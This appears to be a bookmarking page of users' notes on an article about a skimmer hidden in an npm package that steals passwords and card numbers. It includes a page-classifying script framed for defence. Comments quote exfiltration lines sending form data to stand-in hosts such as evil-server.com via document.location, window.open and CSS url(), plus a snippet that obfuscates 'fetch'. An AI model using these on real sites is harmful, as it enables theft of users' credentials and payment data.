I’m harvesting credit card numbers and passwords from your site. Here’s how.


321 bookmarks. First posted by sptz45 january 2018.


The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
development  security  Bookmarks_Toolbar  From_Google_Chrome  Unsorted_Bookmarks  Other_Bookmarks 
5 days ago by marcusrelacion
The malicious code itself is very simple, it does its best work when it runs on a page that meets the following criteria:

The page has a <form>
an element matches input[type="password"] or name="cardnumber" or name="cvc" etc.
The page contains words like “credit card”, “checkout”, “login”, “password” etc.

Then, when there’s a blur event on a password/credit card field, or a form submit event is heard, my code:

Takes data from all form fields (document.forms.forEach(…)) on the ...
security  hacking  hacker  npm  best 
13 days ago by hellsten
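Added example, not code from the article: the three page criteria quoted above, applied to raw HTML so a build or CI step can list which pages a harvester of this kind would treat as targets (and which therefore need hand-written, isolated input handling). It scans markup with regular expressions rather than a live DOM so it runs in plain Node; the HTML samples are constructed, and the autocomplete="cc-*" check extends the article's name-based rule.

```javascript
// Added example: apply the article's target criteria to raw HTML.
// Field-name and keyword lists extend the article's examples; the HTML below is constructed.
const SENSITIVE_FIELD_NAMES = /^(cardnumber|card-number|card_number|ccnumber|cvc|cvv|expiry|exp-date|password|passwd)$/i;
const SENSITIVE_WORDS = /\b(credit card|checkout|login|log in|password|payment)\b/i;

// Return every <input ...> tag with its attributes parsed into an object.
function parseInputs(html) {
  const inputs = [];
  const tagRe = /<input\b([^>]*)>/gi;
  const attrRe = /([a-zA-Z_:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] !== undefined ? a[2] : a[3] !== undefined ? a[3] : a[4];
    }
    inputs.push(attrs);
  }
  return inputs;
}

// Criterion 2: a password field, a card/CVC-looking name, or a payment autocomplete hint.
function isSensitiveInput(attrs) {
  if ((attrs.type || '').toLowerCase() === 'password') return true;
  if (SENSITIVE_FIELD_NAMES.test(attrs.name || '')) return true;
  if (/\bcc-(number|csc|exp)/i.test(attrs.autocomplete || '')) return true;
  return false;
}

// Strip scripts, styles and tags so the keyword test sees visible text only.
function visibleText(html) {
  return html.replace(/<script[\s\S]*?<\/script>/gi, ' ')
             .replace(/<style[\s\S]*?<\/style>/gi, ' ')
             .replace(/<[^>]+>/g, ' ');
}

// Criteria 1 + 2 + 3 together decide whether the page is a target.
function classifyPage(html) {
  const hasForm = /<form\b/i.test(html);
  const sensitiveInputs = parseInputs(html).filter(isSensitiveInput);
  const keyword = visibleText(html).match(SENSITIVE_WORDS);
  return {
    hasForm,
    sensitiveFields: sensitiveInputs.map(i => i.name || i.type),
    keyword: keyword ? keyword[0] : null,
    isTarget: hasForm && sensitiveInputs.length > 0 && keyword !== null,
  };
}

// Constructed sample pages.
const CHECKOUT_HTML = `<html><body><h1>Checkout</h1>
<form action="/pay" method="post">
  <label>Card number <input type="text" name="cardnumber" autocomplete="cc-number"></label>
  <label>CVC <input type="text" name="cvc" autocomplete="cc-csc"></label>
  <button type="submit">Pay</button>
</form></body></html>`;

const LOGIN_HTML = `<html><body><h1>Log in</h1>
<form action="/session" method="post">
  <input type="email" name="email">
  <input type="password" name="password">
</form></body></html>`;

const BLOG_HTML = `<html><body><h1>Latest posts</h1>
<form action="/search"><input type="search" name="q"></form>
<p>Search our archive.</p></body></html>`;

for (const [name, html] of [['checkout', CHECKOUT_HTML], ['login', LOGIN_HTML], ['blog', BLOG_HTML]]) {
  console.log(name, classifyPage(html));
}
```

The blog page has a form but no sensitive field or keyword, so it is not flagged; the checkout and login pages are. Running this over a site's rendered templates gives the list of pages that must not load third-party or unreviewed bundles in the same origin as the inputs.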
javascript 
14 days ago by peterschussheim
You can still have your big ol’ React app with 938 npm packages for the header/footer/nav/whatever, but the part of the page where the user is typing should be in a secured iFrame and it should run only hand-crafted (and may I suggest, not-minified) JavaScript — if you want to do client-side validation.
javascript  npm  security 
14 days ago by spaceninja
RT : We knew that this was coming.
from twitter
14 days ago by leonsp
from instapaper
15 days ago by danielhill
RT : We knew that this was coming.
from twitter
15 days ago by hopeless
We knew that this was coming.
from twitter_favs
15 days ago by deathy
We knew that this was coming.
from twitter_favs
15 days ago by lchin
Recommending an article, "How to steal credit card numbers and passwords via npm?", which describes the various means the author uses to publish malicious code through npm.

One of the tricks: the code in package.js differs from package.min.js, and the malicious code is placed only in the latter.
from twitter_favs
july 2018 by quake0day
Extremely legit concern.

Comments:

* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open(`https://legit-analytics.com?q=${payload}`, '_blank').close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.

* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn't be surprised if most front facing Node.js servers had few limitations on what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..

https://github.com/w3c/webappsec-csp/issues/92"

* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn't define a style-src you could use insertRule to add some css.
e.g. something::after { content:url("evilserver.com/userdatastring") }"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open-source  cool 
july 2018 by dandv
adam  package.json  npm 
july 2018 by blurback
Describes a speculative attack that CSP should help defend against.

n.b. this article also describes a variation using prefetch that can sneak past CSP.
csp  security  prefetch 
july 2018 by wrumsby
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new vulnerability.
Archive 
june 2018 by pesche
via Pocket - I’m harvesting credit card numbers and passwords from your site. Here’s how. - Added May 30, 2018 at 10:46PM
IFTTT  Pocket 
june 2018 by BastiRe
may 2018 by gzhihao
😱 Read this blog post:

🙏 Now you know why you need this package in your app…
from twitter_favs
may 2018 by nigeljames
If an attacker successfully injects any code at all, it’s pretty much game over

Also the URL looks a lot like the 300 other requests to ad networks your site makes.

The point is, just because you don’t see it, doesn’t mean it’s not happening. It’s been more than two years and as far as I know, no one has ever noticed one of my requests. Maybe it’s been in your site this whole time :)

I only send these requests intermittently (about one in seven times, lightly randomised — the ideal trouble-shooting-insanity-inducing frequency).
cybersecurity  javascript  obfuscation  password  creditcard  fear  story  browser  plugin  malvertising 
may 2018 by bwiese
NPM as attack vector:
from twitter
march 2018 by brookr
Great article man.

var i = 'gfudi';
// Shift every character back by one: k(i) === 'fetch'
var k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
Security  hacking  Javascript  Interview 
march 2018 by hackerzhut
web  security  javascript  npm  chrome  extensions  browser  extension 
march 2018 by nununo
security  javascript  webdev  hacks 
march 2018 by lucapostBo
RT : It's probably only a matter of time if it's not happening already.
from twitter_favs
february 2018 by bf4
Web_Security  Security  Computer_Security 
february 2018 by GameGamer43
maninthemiddle  security  data  harvesting  prevention 
february 2018 by gilberto5757
Lucky for me, we live in an age where people install npm packages like they’re popping pain killers.
security  javascript  node.js 
february 2018 by jbrewer999
This has been making the rounds but you should read it and then weep in a corner with the mess we've made.
from twitter_favs
january 2018 by pixelnated